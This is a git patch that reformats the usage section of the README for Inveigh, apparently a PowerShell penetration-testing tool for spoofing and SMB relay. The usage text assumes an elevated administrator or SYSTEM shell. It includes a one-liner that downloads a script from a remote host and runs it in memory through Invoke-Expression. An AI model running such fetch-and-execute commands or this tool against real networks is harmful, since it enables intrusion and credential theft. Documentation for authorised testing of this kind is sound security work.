From 7b6babb8c6242ee70a12f8d64dfc8a5e58b9adbe Mon Sep 17 00:00:00 2001 From: Kevin Robertson Date: Tue, 6 Oct 2015 20:58:56 -0400 Subject: Updated to reflect new module format --- README.md | 12 +++++------- 1 file changed, 5 insertions(+), 7 deletions(-) diff --git a/README.md b/README.md index 0abfc55..729e75e 100644 --- a/README.md +++ b/README.md @@ -17,23 +17,21 @@ Tested minimums are PowerShell 2.0 and .NET 3.5 10. SMB relay support is experimental at this point, use caution if employing on a pen test. # Usage -Obtain an elevated administrator or SYSTEM shell. +Obtain an elevated administrator or SYSTEM shell and use a method to load the module -Use a method to load the module: - -To import with Import-Method: +To import with Import-Method: Import-Module ./Inveigh.ps1 -To import with dot source method: +To import with dot source method: . ./Inveigh.ps1 -To load into memory using Invoke-Expression: +To load into memory using Invoke-Expression: IEX (New-Object Net.WebClient).DownloadString("http://yourhost/Inveigh.ps1") To execute with default settings: Invoke-Inveigh -To load and execute with one line: +To load and execute with one line: Import-Module ./Inveigh.ps1;Invoke-Inveigh To execute with features enabled/disabled: -- cgit v1.2.3